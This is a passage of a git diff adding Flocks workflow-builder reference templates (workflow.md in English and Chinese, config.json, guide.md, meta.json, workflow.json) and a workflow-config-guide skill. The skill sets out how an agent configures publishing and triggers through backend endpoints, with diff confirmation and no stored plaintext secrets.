+[node_1] -> [node_2] -> [node_3] -> [final_node]
+```
+
+| Order | Node | Responsibility |
+| --- | --- | --- |
+| 1 | `[node_1]` | [Node responsibility] |
+| 2 | `[node_2]` | [Node responsibility] |
+| 3 | `[node_3]` | [Node responsibility] |
+
+In plain terms:
+
+```text
+Raw input
+  -> [first processing step]
+  -> [second processing step]
+  -> [third processing step]
+  -> final output
+```
+
+## 3. Inputs
+
+### 3.1 Input Modes
+
+| Priority | Field | Type | Purpose |
+| --- | --- | --- | --- |
+| 1 | `[primary_input]` | `[type]` | [Primary input source] |
+| 2 | `[secondary_input]` | `[type]` | [Optional input source] |
+
+If multiple input fields are provided, the workflow should process `[primary_input]` first.
+
+### 3.2 Common Parameters
+
+| Parameter | Default | Description |
+| --- | --- | --- |
+| `[param_name]` | `[default]` | [Meaning] |
+
+### 3.3 Input Example
+
+```json
+{
+  "input": "replace with a representative sample"
+}
+```
+
+## 4. Module Logic
+
+### 4.1 [node_1]: [Node Name]
+
+This node answers:
+
+- [Question 1]
+- [Question 2]
+
+Processing logic:
+
+1. [Step 1]
+2. [Step 2]
+3. [Step 3]
+
+Tool/model:
+
+- Type: Tool-driven / LLM-driven / Python rule
+- Call: [tool name or model purpose; write none if not used]
+
+Inputs:
+
+| Field | Source | Description |
+| --- | --- | --- |
+| `[field]` | `[source]` | [Description] |
+
+Outputs:
+
+| Field | Description |
+| --- | --- |
+| `[output_field]` | [Description] |
+
+Typical edit points:
+
+- [Common edit point 1]
+- [Common edit point 2]
+
+### 4.2 [node_2]: [Node Name]
+
+Describe every node with the same structure. The node descriptions must be clear enough for Flocks to generate a stable `workflow.json` from this document.
+
+## 5. Outputs
+
+The workflow mainly outputs these fields:
+
+| Field | Type | Meaning |
+| --- | --- | --- |
+| `[result]` | object | [Final result] |
+| `[summary]` | string | [Summary] |
+
+If the workflow writes files, write them under:
+
+```text
+~/.flocks/workspace/outputs/<YYYY-MM-DD>/
+```
+
+Do not write reports, debug files, or intermediate artifacts into the project code directory.
+
+## 6. Publishing And Configuration
+
+The publish page does not decide capabilities directly from `workflow.md`; it reads the `config.json` template and runtime state from storage.
+
+Supported publishing or integration modes:
+
+- API: [supported or not; path or purpose]
+- Syslog: [supported or not; port, protocol, start/stop behavior]
+- Kafka: [supported or not; topic, consumer group, start/stop behavior]
+- Webhook: [supported or not; callback or ingestion behavior]
+- Schedule: [supported or not; trigger cadence]
+
+When editing publishing modes:
+
+- Change the publish template in `config.json`.
+- Change runtime start/stop state through the publish page and backend runtime state.
+- Do not write plaintext API keys, passwords, or tokens into `workflow.md` or `config.json`.
+
+## 7. How To Edit This Workflow
+
+Use the target change to locate the right area:
+
+| Change target | Edit first |
+| --- | --- |
+| Input fields or entry modes | `[entry_node]` |
+| Field mapping or normalization | `[normalize_node]` |
+| Decision, filtering, aggregation, or analysis rules | `[logic_node]` |
+| Output fields or file format | `[output_node]` |
+| Publishing and integration configuration | `config.json` |
+| Flow structure, added nodes, or removed nodes | `workflow.md`, then regenerate `workflow.json` after confirmation |
+
+Basic editing principles:
+
+- If you change input fields, update the sample input.
+- If you rename standard fields, update every downstream node.
+- If you change decision rules, update output descriptions and validation samples.
+- If you change output format, confirm downstream systems can still read it.
+
+## 8. Validation
+
+Minimum validation:
+
+1. Run one normal input and confirm the main output fields are non-empty.
+2. Run one edge-case input and confirm error handling behaves as expected.
+3. If there are branches, validate each important branch at least once.
+4. If files are written, check the output path and file content.
+5. If there is publish configuration, confirm the publish page only shows enabled capabilities.
+
+Acceptance checklist:
+
+- [ ] Inputs are correctly recognized and parsed.
+- [ ] Each node has a clear responsibility and outputs fields downstream nodes can read.
+- [ ] Branch, filtering, aggregation, or analysis logic matches expectations.
+- [ ] Output fields and file formats are clear.
+- [ ] `workflow.md` and `workflow.json` describe the same flow.
+- [ ] No plaintext secrets are written into the workflow directory.
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/config.json b/.flocks/plugins/skills/workflow-builder/references/workflow_template/config.json
new file mode 100644
index 000000000..c6dcb80df
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/config.json
@@ -0,0 +1,126 @@
+{
+  "version": 1,
+  "kind": "workflow.integration-config",
+  "workflow": {
+    "id": null,
+    "name": "<workflow_name>",
+    "source": "project"
+  },
+  "updatedAt": 0,
+  "publish": {
+    "type": "api_service",
+    "enabled": false,
+    "status": "stopped",
+    "driver": "local",
+    "apiKeyConfigured": false,
+    "allowedActions": [
+      "publish",
+      "stop",
+      "copyInvokeUrl",
+      "rotateApiKey"
+    ]
+  },
+  "triggers": [
+    {
+      "id": "syslog-default",
+      "type": "syslog",
+      "name": "Syslog Listener",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "host": "0.0.0.0",
+        "port": 1514,
+        "protocol": "udp",
+        "format": "auto"
+      },
+      "mapping": {
+        "syslog_message": "$.body"
+      },
+      "inputs": {},
+      "allowedActions": [
+        "start",
+        "stop"
+      ]
+    },
+    {
+      "id": "kafka-default",
+      "type": "kafka",
+      "name": "Kafka Consumer",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "inputBroker": "localhost:9092",
+        "inputTopic": "<topic>",
+        "inputGroupId": "<workflow_id>-group",
+        "autoOffsetReset": "latest"
+      },
+      "mapping": {
+        "kafka_message": "$.body"
+      },
+      "inputs": {},
+      "allowedActions": [
+        "start",
+        "stop"
+      ]
+    },
+    {
+      "id": "schedule-default",
+      "type": "schedule",
+      "name": "Cron Schedule",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "mode": "cron",
+        "cron": "*/5 * * * *",
+        "intervalSeconds": 300,
+        "timezone": "Asia/Shanghai"
+      },
+      "runtime": {
+        "timeoutSeconds": 7200,
+        "noOverlap": true
+      },
+      "inputs": {
+        "trigger": "schedule"
+      },
+      "allowedActions": [
+        "start",
+        "stop"
+      ]
+    },
+    {
+      "id": "webhook-default",
+      "type": "custom_webhook",
+      "name": "Webhook Trigger",
+      "enabled": false,
+      "status": "stopped",
+      "source": {
+        "method": "POST",
+        "path": "/workflows/<workflow_id>/hook"
+      },
+      "auth": {
+        "type": "api_key",
+        "apiKeyConfigured": false,
+        "headerName": "x-api-key"
+      },
+      "mapping": {
+        "event": "$.body"
+      },
+      "inputs": {},
+      "allowedActions": [
+        "enable",
+        "disable",
+        "copyWebhookUrl"
+      ]
+    }
+  ],
+  "rendering": {
+    "rule": "The publish page renders only configured publish and trigger modes.",
+    "hideUnconfiguredModes": true,
+    "secretsPolicy": "Do not store plaintext secrets; store secret references or configured booleans."
+  },
+  "referenceNotes": {
+    "templateOnly": true,
+    "usage": "Copy only the publish mode and trigger entries needed by the real workflow. Remove unused trigger examples before saving the workflow config.",
+    "runtimePolicy": "This file is a desired capability template. Publishing, unpublishing, and trigger start or stop actions must call runtime APIs instead of editing config.json."
+  }
+}
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/guide.md b/.flocks/plugins/skills/workflow-builder/references/workflow_template/guide.md
new file mode 100644
index 000000000..1ca7c7e09
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/guide.md
@@ -0,0 +1,115 @@
+# workflow_template 配置引导参考
+
+这个文件是 `workflow-builder` skill 内部的 `guide.md` 参考模板，用于创建真实工作流时改写成该工作流自己的配置引导文件。
+
+真实工作流被配置时，Rex 必须读取真实工作流目录下的 `guide.md`，而不是把本参考模板当成工作流细节来源。
+
+`workflow-config-guide` skill 只提供交互协议；本文件才是工作流配置细节、默认选项和验证方式的来源。
+
+## 1. 工作流定位
+
+- 工作流 ID：`workflow_template`
+- 适用场景：模板占位工作流，用于复制后改造成真实工作流。
+- 当前状态：隐藏模板，不应在普通 UI 中作为可运行工作流展示。
+
+## 2. AI 引导方式
+
+真实工作流的 `guide.md` 不需要描述 UI 快捷入口。快捷入口只是用户意图来源，Rex 应该：
+
+1. 读取真实工作流的 `guide.md` 全文。
+2. 根据用户点击的入口或自然语言需求，自动定位相关章节。
+3. 提取该章节里的默认值、约束、样例、验证方法和禁止事项。
+4. 用 question 工具一次只问一个最关键问题。
+5. 必须提供自定义/补充输入；没有则填 `none`。
+
+## 3. 输入模式
+
+创建真实工作流的 `guide.md` 时，请把这里改成真实入口。
+
+建议写清楚：
+
+- 支持哪些入口：API、Syslog、Kafka、Webhook、Schedule、File、Manual test。
+- 每种入口对应的 `config.json`/Storage 模板字段。
+- 哪些入口互斥，哪些可以同时存在。
+- 默认推荐哪个入口，以及原因。
+
+Rex 提问要求：
+
+- 一次只问一个输入模式问题。
+- 必须提供自定义/补充输入；没有则填 `none`。
+- 如果输入模式会改变发布模板，先展示 diff，再用 question 工具确认。
+
+## 4. 来源形态
+
+创建真实工作流的 `guide.md` 时，请描述真实来源。
+
+建议写清楚：
+
+- 来源产品或系统名称。
+- payload 是对象、列表、文件路径、文本消息还是其它格式。
+- 必填字段、可选字段和默认值。
+- 字段映射由哪个节点处理。
+- 是否已有代表性样例。
+
+## 5. 输出去向
+
+创建真实工作流的 `guide.md` 时，请描述真实输出。
+
+建议写清楚：
+
+- API 返回字段。
+- 文件落盘路径。
+- Kafka/IM/channel/下游工作流等外发方式。
+- 输出失败或空结果时的行为。
+
+## 6. 处理规则
+
+创建真实工作流的 `guide.md` 时，请描述用户最常改的业务规则。
+
+建议写清楚：
+
+- 过滤条件。
+- 阈值。
+- 去重或聚合策略。
+- 开关项。
+- 哪些低层参数默认隐藏，不主动询问。
+
+## 7. 样例验证
+
+创建真实工作流的 `guide.md` 时，请放入一条最小可用样例，或说明用户应该粘贴什么格式。
+
+Rex 验证时应优先做轻量检查：
+
+- JSON/文本格式是否正确。
+- 字段映射是否能进入入口节点。
+- 预期输出是否符合 workflow.md。
+- 不要启用外部副作用，除非用户明确确认。
+
+## 8. 应用方式
+
+发布配置模板的生效来源：
+
+- 优先读后端 Storage/SQL 的 `/api/workflow/<id>/config`。
+- 如果库里没有，调用 `/api/workflow/<id>/config/sync`，由后端读取工作流目录下的 `config.json` 并迁移到 Storage/SQL。
+- `config.json` 是导入/兜底模板，不是运行态开关。
+- 不要直接写 `config.json` 来表示发布、接入或触发配置已经生效。
+- 启停、发布、取消发布等运行态动作必须调用运行时接口，不要通过修改 `config.json` 完成。
+- 如果后端配置接口不可用，只能把目标配置保存为草稿到 outputs，并明确说明未应用、未发布、未启动。
+
+应用变更前：
+
+- 展示计划。
+- 展示 diff。
+- 用 question 工具确认应用、保存草稿或暂不修改。
+
+## 9. 查配置
+
+只读检查顺序：
+
+1. 读取本文件。
+2. 读取 `workflow.md` 和 `workflow.json`。
+3. 查询 `/api/workflow/<id>/config`。
+4. 必要时查看 `config.json` 是否只是兜底模板。
+5. 汇总已配置项、缺失项和最推荐下一步。
+
+查配置不得修改文件或运行态。
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/meta.json b/.flocks/plugins/skills/workflow-builder/references/workflow_template/meta.json
new file mode 100644
index 000000000..a51696a87
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/meta.json
@@ -0,0 +1,19 @@
+{
+  "id": "workflow_template",
+  "name": "Workflow Builder Reference Template",
+  "nameI18n": {
+    "zh-CN": "工作流创建参考模板",
+    "en-US": "Workflow Builder Reference Template"
+  },
+  "description": "Internal workflow-builder reference package for workflow.md, workflow.json, config.json, and guide.md authoring.",
+  "category": "template",
+  "status": "hidden",
+  "hidden": true,
+  "templateOnly": true,
+  "visibility": "hidden",
+  "excludeFromUI": true,
+  "excludeFromPrompt": true,
+  "createdBy": null,
+  "createdAt": 0,
+  "updatedAt": 0
+}
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.json b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.json
new file mode 100644
index 000000000..92694e7e0
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.json
@@ -0,0 +1,39 @@
+{
+  "id": "workflow_template",
+  "name": "workflow_template",
+  "nameI18n": {
+    "zh-CN": "工作流模板",
+    "en-US": "Workflow Template"
+  },
+  "description": "Hidden template for workflow.json, workflow.md, and config.json.",
+  "start": "template_entry",
+  "nodes": [
+    {
+      "id": "template_entry",
+      "type": "python",
+      "description": "Template placeholder. Copy this directory and replace the workflow before use.",
+      "code": "outputs['templateOnly'] = True\noutputs['message'] = 'Hidden workflow template; copy before use.'"
+    }
+  ],
+  "edges": [],
+  "metadata": {
+    "hidden": true,
+    "templateOnly": true,
+    "visibility": "hidden",
+    "excludeFromUI": true,
+    "excludeFromPrompt": true,
+    "templateVersion": 1,
+    "requiredFiles": [
+      "workflow.json",
+      "workflow.md",
+      "config.json",
+      "meta.json"
+    ],
+    "publishConfigContract": {
+      "api": "When config.publish.type is api_service, the publish page shows only API publish controls.",
+      "syslog": "When config.triggers only contains syslog, the publish page shows only syslog listener start/stop controls.",
+      "kafka": "When config.triggers only contains kafka, the publish page shows only kafka consumer start/stop controls.",
+      "schedule": "When config.triggers only contains schedule, the publish page shows only schedule start/stop controls."
+    }
+  }
+}
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.md b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.md
new file mode 100644
index 000000000..5cb9fb87d
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_template/workflow.md
@@ -0,0 +1,117 @@
+# workflow_template
+
+> `workflow.md` is the single human-editable workflow specification. Flocks uses this file to understand intent, then keeps `workflow.json` aligned with the executable graph.
+
+## 1. Workflow Card
+
+- Workflow ID: `workflow_template`
+- Reference directory: `.flocks/plugins/skills/workflow-builder/references/workflow_template/`
+- Category: `template`
+- Status: skill reference template, not a scannable workflow
+- Entry node: `template_entry`
+- Terminal node: `template_entry`
+
+## 2. Business Goal
+
+Describe the operational problem this workflow solves, who will use it, and what a successful run produces.
+
+Success criteria:
+
+- [ ] The expected input shape is clear.
+- [ ] Each module has an explicit responsibility.
+- [ ] The final output contract is clear to humans and downstream systems.
+- [ ] Failure and empty-input behavior are documented.
+
+## 3. Runtime Contract
+
+### Inputs
+
+Replace this section with the real input keys and shapes.
+
+| Field | Type | Required | Default | Description |
+| --- | --- | --- | --- | --- |
+| `input` | object | yes | - | Primary workflow input. |
+
+### Outputs
+
+Replace this section with the final output contract.
+
+| Field | Type | Description |
+| --- | --- | --- |
+| `result` | object | Final workflow result. |
+
+### Tunables
+
+List thresholds, switches, timeouts, file paths, concurrency settings, and rollback notes.
+
+## 4. Flow Map
+
+`template_entry`
+
+| Order | Node | Type | Responsibility | Next |
+| --- | --- | --- | --- | --- |
+| 1 | `template_entry` | Python | Placeholder entry node. Replace before use. | final output |
+
+## 5. Module Specs
+
+### 1. template_entry
+
+| Item | Content |
+| --- | --- |
+| Module type | Python |
+| Responsibility | Placeholder node that marks this directory as a template. |
+| Inputs | Workflow inputs |
+| Outputs | `templateOnly`, `message` |
+| Edit focus | Replace this node with the real first module. |
+
+Generation notes for Flocks:
+
+- Keep node IDs stable after users start configuring publish modes.
+- When adding or renaming outputs, update downstream edges and the runtime contract.
+- Do not store plaintext secrets in this directory.
+
+## 6. Data Flow And Field Contract
+
+Document every cross-module field that must remain stable.
+
+- `template_entry -> final output`
+
+## 7. Publish And Triggers
+
+The publish page reads `config.json` as a template and runtime state from storage.
+
+- If `publish.type` is `api_service`, show API publish controls.
+- If only `syslog` is configured, show only syslog listener start/stop controls.
+- If only `kafka` is configured, show only kafka consumer start/stop controls.
+- If only `schedule` is configured, show only schedule start/stop controls.
+- Store secret references or configured booleans only; never store plaintext secrets.
+
+Workflow configuration guidance lives in `guide.md`.
+
+- `workflow-config-guide` defines interaction rules only.
+- A real workflow's own `guide.md` defines that workflow's actual configuration questions, defaults, samples, and validation steps.
+- Workflow chat shortcut buttons must read the real workflow's `guide.md` before asking or applying any configuration step.
+
+## 8. Change Guide
+
+| Change type | Edit first | Also check |
+| --- | --- | --- |
+| Input shape | Runtime Contract | Entry module, sample inputs |
+| Module logic | Module Specs | Upstream outputs, downstream inputs |
+| Output shape | Runtime Contract | Terminal module, downstream consumers |
+| Publish mode | Publish And Triggers / `config.json` | Auth, secret refs, runtime state |
+
+## 9. Flocks Generation Constraints
+
+- `workflow.md` describes intent, module boundaries, field contracts, and validation.
+- `workflow.json` describes executable nodes, edges, code, triggers, and metadata.
+- Regeneration should preserve node IDs unless the user explicitly requests a graph change.
+- Deleting or renaming a node requires updating edges, mappings, samples, and tests.
+
+## 10. Validation Checklist
+
+- [ ] `workflow.md` and `workflow.json` describe the same flow.
+- [ ] A representative sample input runs successfully.
+- [ ] At least one edge or error case is documented.
+- [ ] Publish page only shows capabilities enabled by `config.json`.
+- [ ] No plaintext secrets are stored in the workflow directory.
diff --git a/.flocks/plugins/skills/workflow-builder/references/workflow_zh.md b/.flocks/plugins/skills/workflow-builder/references/workflow_zh.md
new file mode 100644
index 000000000..5adb56027
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-builder/references/workflow_zh.md
@@ -0,0 +1,189 @@
+# [workflow_id]
+
+> 这是一份中文 `workflow.md` 结构模板。创建工作流时，把占位内容替换成真实业务内容，并只把最终内容写入工作流目录下的 `workflow.md`。
+
+## 1. 功能概述
+
+`[workflow_id]` 是一个 [一句话说明工作流类型]。
+
+它主要解决三件事：
+
+- [目标 1：这个工作流接收或整理什么信息。]
+- [目标 2：它如何处理、判断、过滤、聚合或分析。]
+- [目标 3：它最终输出什么结果，给谁使用。]
+
+适用场景：
+
+- [场景 1]
+- [场景 2]
+- [场景 3]
+
+不适合做的事：
+
+- [边界 1]
+- [边界 2]
+- 不保存明文密钥；凭证、启停状态和运行时配置应由配置和数据库管理。
+
+## 2. 总体流程
+
+工作流按下面顺序处理：
+
+```text
+[node_1] -> [node_2] -> [node_3] -> [final_node]
+```
+
+| 顺序 | 节点 | 作用 |
+| --- | --- | --- |
+| 1 | `[node_1]` | [节点职责] |
+| 2 | `[node_2]` | [节点职责] |
+| 3 | `[node_3]` | [节点职责] |
+
+可以把它理解成：
+
+```text
+原始输入
+  -> [第一步处理]
+  -> [第二步处理]
+  -> [第三步处理]
+  -> 最终输出
+```
+
+## 3. 输入说明
+
+### 3.1 输入方式
+
+| 优先级 | 字段 | 类型 | 用途 |
+| --- | --- | --- | --- |
+| 1 | `[primary_input]` | `[type]` | [主要输入来源] |
+| 2 | `[secondary_input]` | `[type]` | [可选输入来源] |
+
+如果同时传入多个输入字段，工作流优先处理 `[primary_input]`。
+
+### 3.2 常用输入参数
+
+| 参数 | 默认值 | 说明 |
+| --- | --- | --- |
+| `[param_name]` | `[default]` | [参数含义] |
+
+### 3.3 输入示例
+
+```json
+{
+  "input": "replace with a representative sample"
+}
+```
+
+## 4. 模块逻辑
+
+### 4.1 [node_1]：[节点名称]
+
+这个节点负责回答：
+
+- [问题 1]
+- [问题 2]
+
+处理逻辑：
+
+1. [步骤 1]
+2. [步骤 2]
+3. [步骤 3]
+
+工具/模型：
+
+- 类型：Tool-driven / LLM-driven / Python rule
+- 调用：[工具名或模型用途；没有则写无]
+
+输入：
+
+| 字段 | 来源 | 说明 |
+| --- | --- | --- |
+| `[field]` | `[source]` | [说明] |
+
+输出：
+
+| 字段 | 说明 |
+| --- | --- |
+| `[output_field]` | [说明] |
+
+你通常会在这里修改：
+
+- [常见修改点 1]
+- [常见修改点 2]
+
+### 4.2 [node_2]：[节点名称]
+
+按同样结构描述每个节点。节点描述必须能让 Flocks 根据本文档稳定生成 `workflow.json`。
+
+## 5. 输出说明
+
+工作流主要输出这些字段：
+
+| 字段 | 类型 | 含义 |
+| --- | --- | --- |
+| `[result]` | object | [最终结果] |
+| `[summary]` | string | [摘要] |
+
+如果工作流会写文件，文件应写入：
+
+```text
+~/.flocks/workspace/outputs/<YYYY-MM-DD>/
+```
+
+不要把报告、调试产物或中间 artifacts 写到项目代码目录。
+
+## 6. 发布和配置
+
+发布页面不直接从 `workflow.md` 决定展示什么能力，而是读取 `config.json` 模板和数据库中的运行时状态。
+
+当前可配置的接入或发布方式：
+
+- API：[是否支持；路径或用途]
+- Syslog：[是否支持；端口、协议、启停说明]
+- Kafka：[是否支持；topic、consumer group、启停说明]
+- Webhook：[是否支持；回调或接入说明]
+- Schedule：[是否支持；触发周期说明]
+
+编辑发布方式时：
+
+- 改发布模板：看 `config.json`。
+- 改运行启停状态：看发布页和后端运行时状态。
+- 不要把明文 API Key、密码、token 写进 `workflow.md` 或 `config.json`。
+
+## 7. 怎么编辑这个工作流
+
+按你想改的目标定位：
+
+| 修改目标 | 优先修改 |
+| --- | --- |
+| 输入字段或入口方式 | `[entry_node]` |
+| 字段映射或标准化 | `[normalize_node]` |
+| 判断、过滤、聚合、分析规则 | `[logic_node]` |
+| 输出字段或文件格式 | `[output_node]` |
+| 发布方式和接入配置 | `config.json` |
+| 流程结构、节点增删 | `workflow.md`，确认后再生成 `workflow.json` |
+
+修改时的基本原则：
+
+- 改输入字段，要同步样例输入。
+- 改标准字段名，要同步所有下游节点。
+- 改判断规则，要同步输出说明和验证样例。
+- 改输出格式，要确认下游系统还能读取。
+
+## 8. 验证方式
+
+最小验证建议：
+
+1. 用一条正常输入跑通，确认主要输出字段非空。
+2. 用一条边界输入确认异常处理符合预期。
+3. 如果有分支，至少验证每个关键分支一次。
+4. 如果写文件，检查输出路径和文件内容。
+5. 如果有发布配置，确认发布页只展示当前配置启用的能力。
+
+验收清单：
+
+- [ ] 输入能被正确识别和解析。
+- [ ] 每个节点的职责清晰且输出可被下游读取。
+- [ ] 分支、过滤、聚合或分析逻辑符合预期。
+- [ ] 输出字段和文件格式清晰。
+- [ ] `workflow.md` 和 `workflow.json` 描述同一个流程。
+- [ ] 没有明文密钥写入工作流目录。
diff --git a/.flocks/plugins/skills/workflow-config-guide/SKILL.md b/.flocks/plugins/skills/workflow-config-guide/SKILL.md
new file mode 100644
index 000000000..20970988c
--- /dev/null
+++ b/.flocks/plugins/skills/workflow-config-guide/SKILL.md
@@ -0,0 +1,164 @@
+---
+name: workflow-config-guide
+category: system
+ui_hidden: true
+description: 配置现有 Flocks 工作流的发布、集成、触发器和发布配置模板；本 skill 只定义交互协议，具体配置问题必须来自工作流目录内的 guide.md
+---
+
+# Workflow Config Guide
+
+Use this skill when the user asks to configure, publish, integrate, deploy, or validate an existing Flocks workflow, especially when the task involves publish configuration templates, `config.json` import/fallback, API publishing, Syslog/Kafka/Webhook/Schedule triggers, file input, downstream output, sample validation, or a first-time deployment guide.
+
+This skill is a protocol layer only. It must not be used as the source of workflow-specific configuration questions or defaults. For every existing workflow, the source of truth for configuration details is the workflow-local `guide.md` file in the same directory as `workflow.md`, `workflow.json`, and optional `config.json`.
+
+Do not use this skill to create a brand-new workflow from scratch. Use `workflow-builder` for workflow design and generation, then return to this skill when the workflow already exists and needs runtime configuration.
+
+## Quick Start
+
+1. Identify the current workflow directory. Prefer the explicit path in the user request; otherwise inspect the active workflow context and project/user workflow roots.
+2. Read the workflow-local `guide.md` first. If it is missing or too thin to answer the user's request, stop and use the `question` tool to ask whether to generate or repair `guide.md` from `workflow.md`, `workflow.json`, and `config.json`.
+3. Read the workflow files that exist: `workflow.json`, `workflow.md`, optional legacy `config.json`, and `meta.json`. Treat the backend `/api/workflow/<workflow_id>/config` response as the canonical publish template. If no stored template exists, use `/api/workflow/<workflow_id>/config/sync` to let the backend migrate the fallback `config.json`.
+4. Summarize the current configurable capabilities in plain language, using `guide.md` as the source for workflow-specific modes, defaults, sample requirements, validation, and recommended question order.
+5. When any user decision, missing value, preference, or confirmation is needed, call the `question` tool. Do not ask configuration questions in ordinary assistant text.
+6. Before changing the publish template, show a unified diff against the canonical backend config, then call the `question` tool for explicit confirmation. That single approval authorizes applying the shown diff through the backend config endpoint; do not ask a second "should I call PUT" question for the same diff.
+7. After applying changes, validate JSON syntax and run the lightest useful workflow/config smoke test available.
+8. End with a concise report in chat and save a timestamped report under `~/.flocks/workspace/outputs/<today>/`, computing `<today>` at execution time.
+
+## Workflow-local Guide Contract
+
+Each workflow that can be configured by Rex should include:
+
+```text
+<workflow_dir>/
+  workflow.md
+  workflow.json
+  config.json        # optional import/fallback publish template
+  guide.md          # workflow-specific configuration guide
+```
+
+`guide.md` must answer these questions for this workflow, in the workflow's own domain language:
+
+- What problem the workflow solves and which runtime paths are supported.
+- What information must be collected from the user before configuration can be applied.
+- Recommended defaults and safe fallback behavior.
+- Which values are runtime state in Storage/SQL rather than editable template fields.
+- Sample input requirements and the lightest validation method.
+
+`guide.md` should not contain a UI button table. If a user clicks a guide shortcut, treat the shortcut label as an intent hint, read `guide.md`, semantically extract the relevant guidance, defaults, constraints, examples, and validation rules, then ask the single next useful question with the `question` tool. If no relevant guidance exists, say that the workflow guide is missing that detail and ask whether to repair `guide.md`.
+
+## Configuration Contract
+
+Treat the publish configuration template as a workflow runtime/publish template, not as a second copy of workflow code. The canonical template is stored in Storage/SQL under the backend workflow config endpoint. A workflow-local `config.json` is only an import/fallback artifact: when the backend has no stored template, it may read `config.json` once and migrate that content into Storage/SQL.
+
+- If the stored template declares only API publishing, the publish page should expose only API publish controls.
+- If the stored template declares only Syslog, Kafka, Webhook, or Schedule triggers, the publish page should expose only that trigger's start/stop or enable/disable controls.
+- Do not store plaintext secrets in the template; store booleans such as `apiKeyConfigured` or secret-manager references.
+- Never edit workflow-local `config.json` to apply a publish, input, or trigger configuration. It is a fallback import template only.
+- Treat the template as display/intent only. Real enabled/running/stopped state must come from runtime APIs backed by Storage/SQL, never from editing a template file directly.
+- Do not modify workflow node code while applying runtime configuration unless the user explicitly asks for a code change.
+- Re-running with the same answers should be idempotent: no changes, or a small diff limited to comments/timestamps.
+
+## Conversation Pattern
+
+Guide the user from "I have this workflow" to "I know what is configured and what I still need to do".
+
+Ask decisions in the order specified by `guide.md`, using one `question` tool call per step. If `guide.md` has no order, use the clicked shortcut as the current step and ask only the single most relevant question for that shortcut. The generic categories below are only fallback headings for organizing a guide file, not universal workflow defaults:
+
+1. **Input mode**
+2. **Source system or data shape**
+3. **Output destinations**
+4. **Filtering or business defaults**
+5. **Validation sample**
+6. **Apply or draft**
+
+### Mandatory Question Tool Rule
+
+The `question` tool is mandatory for this skill. Any time you need the user to choose, confirm, approve a diff, provide a missing value, decide whether to change another file, or answer a follow-up, stop prose and call `question`.
+
+- Ordinary assistant text may summarize the current state, explain a proposed diff, or report results. It must not contain actionable questions such as "要不要...", "是否...", "请确认...", or numbered follow-ups like "第二个问题...".
+- If `question` is not available in the tool list, say that the configuration guide cannot continue interactively until the `question` tool is available. Do not fall back to inline chat questions.
+- Use one question card per turn. Do not ask several independent decisions in a single text paragraph.
+- For diff approval, show the diff first, then call `question` with choices such as "应用上面的 diff", "只保存草稿", and "暂不修改". If the user chooses to apply the shown diff, immediately apply it through the backend config endpoint; do not ask an extra confirmation that only repeats the same side effect.
+- For side-effect scope questions, such as "是否顺手修改 workflow.md", call `question`; do not ask in prose.
+
+Rule anchor: never make a configuration question choice-only.
+
+Never make a configuration question choice-only. Every Question-tool prompt used by this skill must include a way for the user to type a custom answer:
+
+- Prefer a `type: "text"` question when the answer may be a hostname, port, topic, path, payload shape, product name, or any value not safely covered by fixed options.
+- If you provide a `type: "choice"` question for recommended modes, also include a short `type: "text"` follow-up such as "Custom value or notes" with a placeholder that explains what the user can type. If the user has no custom value, allow them to enter "none".
+- Do not force the user into only API/Syslog/Kafka/Webhook/Schedule choices; custom integration modes, source products, output destinations, and deployment notes must be expressible in free text.
+
+Do not use the Question tool to collect long JSON, field lists, or credentials.
+
+Good pattern after showing a diff:
+
+```json
+{
+  "questions": [
+    {
+      "header": "确认应用",
+      "question": "是否应用上面的发布配置 diff?",
+      "type": "choice",
+      "options": [
+        {"label": "应用 diff", "description": "通过后端配置接口写入 Storage/SQL。"},
+        {"label": "只保存草稿", "description": "不改运行配置，只写到输出目录。"},
+        {"label": "暂不修改", "description": "停止本次配置变更。"}
+      ]
+    },
+    {
+      "header": "补充说明",
+      "question": "如需限制范围或补充要求，请输入；没有则填 none。",
+      "type": "text",
+      "placeholder": "none"
+    }
+  ]
+}
+```
+
+## Applying Publish Configuration
+
+When the user approves an apply:
+
+1. Read and preserve the previous canonical template from `GET /api/workflow/<workflow_id>/config`.
+2. If the response says no stored template exists, call `POST /api/workflow/<workflow_id>/config/sync` so the backend migrates the fallback file or creates a generated template.
+3. Deep-merge the selected values into the existing config shape where possible.
+4. Prefer the backend template endpoint: `PUT /api/workflow/<workflow_id>/config` with the full proposed config object as the JSON body.
+5. Use the response's `config` as the saved template and `runtime` as the current effective state; do not infer runtime state from template `enabled` fields.
+6. If the endpoint is unavailable, save a draft under `~/.flocks/workspace/outputs/<today>/` instead of changing `config.json`, and clearly state that the change was not applied, not published, and not started.
+7. Validate with a JSON parser.
+8. Verify the publish page or config endpoint returns the saved template from Storage/SQL.
+9. Run a smoke test with `metadata.sampleInputs`, `workflow.json` sample inputs, or the user's pasted sample when a safe local test is available.
+10. If validation fails, restore the previous template through `PUT /api/workflow/<workflow_id>/config` and report the exact failure.
+
+If the user says "publish as API", "Syslog input", "Kafka input", "Webhook input", or "Schedule" from the Publish page, treat it as a guided configuration intent:
+
+- First identify whether the user wants to declare/change the template, start/stop runtime state, or both.
+- For template changes, use `GET /config` -> diff -> question confirmation -> `PUT /config`.
+- For runtime actions, use the runtime endpoint after template confirmation, such as `/publish`, `/unpublish`, `/syslog-config`, `/kafka-config`, `/poller-config`, or `/triggers`.
+- If the backend is unreachable, do not say "the user should publish later in the WebUI" as if the requested action succeeded. Save a draft and report the exact blocker.
+
